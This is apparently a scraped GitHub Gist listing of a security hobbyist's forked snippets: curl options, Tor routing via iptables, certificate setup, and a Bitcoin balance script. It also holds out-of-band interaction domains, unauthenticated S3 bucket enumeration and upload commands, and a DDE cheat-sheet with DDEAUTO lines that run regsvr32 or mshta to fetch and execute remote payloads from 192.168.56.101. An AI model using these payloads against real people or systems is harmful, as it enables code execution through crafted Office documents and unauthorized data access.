Pwning

calfcrusher CalfCrusher
CalfCrusher / curl.md
Created Nov 10, 2022 — forked from subfuzion/curl.md
curl POST examples

Common Options

-#, --progress-bar Make curl display a simple progress bar instead of the more informational standard meter.

-b, --cookie <name=data> Supply cookie with request. If no =, then specifies the cookie file to use (see -c).

-c, --cookie-jar <file name> File to save response cookies to.

View Out of band interaction domains
interact.sh
oast.pro
oast.live
oast.site
oast.online
oast.fun
oast.me
burpcollaborator.net
oastify.com
canarytokens.com
CalfCrusher / route-traffic-through-tor-iptables.md
Created Oct 25, 2022 — forked from jkullick/route-traffic-through-tor-iptables.md
Route all Traffic through Tor for specific User on Linux with IPTables
iptables -A OUTPUT -p icmp -j REJECT
iptables -t nat -A OUTPUT ! -o lo -p tcp -m owner --uid-owner $USER -m tcp -j REDIRECT --to-ports 9040
iptables -t nat -A OUTPUT ! -o lo -p udp -m owner --uid-owner $USER -m udp --dport 53 -j REDIRECT --to-ports 53
iptables -t filter -A OUTPUT -p tcp -m owner --uid-owner $USER -m tcp --dport 9040 -j ACCEPT
iptables -t filter -A OUTPUT -p udp -m owner --uid-owner $USER -m udp --dport 53 -j ACCEPT
iptables -t filter -A OUTPUT ! -o lo -m owner --uid-owner $USER -j DROP
CalfCrusher / tor.sh
Created Oct 25, 2022 — forked from DarthPumpkin/tor.sh
OS X shell script for routing all traffic through Tor. Requires tor to be installed (brew install tor). Taken from https://kremalicious.com/simple-tor-setup-on-mac-os-x/, modified from http://leonid.shevtsov.me/en/an-easy-way-to-use-tor-on-os-x. To stop using Tor, just terminate this script with Ctrl+C.
#!/usr/bin/env bash
# 'Wi-Fi' or 'Ethernet' or 'Display Ethernet'
INTERFACE=Wi-Fi
# Ask for the administrator password upfront
sudo -v
# Keep-alive: update existing `sudo` time stamp until finished
while true; do sudo -n true; sleep 60; kill -0 "$$" || exit; done 2>/dev/null &
View route-all-traffic-through-tor.md

Do not use this on a production server or if you don't know what iptables does.

Add this to torrc (located at /etc/tor/torrc):

VirtualAddrNetwork 10.192.0.0/10

AutomapHostsOnResolve 1

TransPort 9051 
CalfCrusher / readme.md
Created Oct 22, 2022 — forked from sohlich/readme.md
Let's Encrypt - generate SSL certificate manually via Certbot DNS Challenge

Install Certbot

OSX

$ brew install certbot

Linux

CalfCrusher / readme.txt
Created Oct 19, 2022 — forked from nathanqthai/readme.txt
simple tornado server with ssl
to generate example certs
openssl req -x509 -nodes -days 365 -newkey rsa:2048 -keyout host.key -out host.crt
run server:
chmod +x server.py
./server.py
test server:
openssl s_client -connect localhost:8888
CalfCrusher / aws-s3-buckets-pentest.txt
Created Sep 28, 2022 — forked from Anon-Exploiter/aws-s3-buckets-pentest.txt
Useful commands while testing s3 buckets!
aws s3 ls s3://s3buckethere --no-sign-request ## Lists the files in the s3 bucket
aws s3 cp s3://bucketname/filethere.txt . --no-sign-request ## Downloads `filethere.txt` from the s3 bucket in the current directory
aws s3 cp test.txt s3://bucketname --no-sign-request ## Uploads `test.txt` from current directory to the s3 bucket
aws s3api get-bucket-acl --bucket bucketname --no-sign-request ## Shows ACL (Access Control List) of the given bucket
aws s3api get-object-acl --bucket bucketname --key fileons3bucket.ext --no-sign-request ## Shows ACL (Access Control List) of given object in the bucket
CalfCrusher / btcbal.py
Created Sep 25, 2022 — forked from lukem512/btcbal.py
Retrieve Bitcoin address balance from Blockchain API
#!/usr/bin/python
import sys
import getopt
import urllib2
from optparse import OptionParser
def main():
    # variables
    btcaddr = ""
CalfCrusher / Macro-Less-Cheatsheet.md
Created Aug 8, 2022 — forked from mgeeky/Macro-Less-Cheatsheet.md
Macro-Less Code Execution in MS Office via DDE (Dynamic Data Exchange) techniques Cheat-Sheet

  • Using regsvr32 *.sct files technique:
DDEAUTO C:\\Programs\\Microsoft\\Office\\MSword.exe\\..\\..\\..\\..\\Windows\\System32\\cmd.exe "/c Microsoft Office Application data   || regsvr32 /s /n /u /i:http://192.168.56.101/empire2.sct scrobj.dll"
  • Using HTA files technique:
DDEAUTO C:\\Programs\\Microsoft\\Office\\MSword.exe\\..\\..\\..\\..\\Windows\\System32\\cmd.exe "/c Microsoft Office Application data || mshta http://192.168.56.101/poc.hta"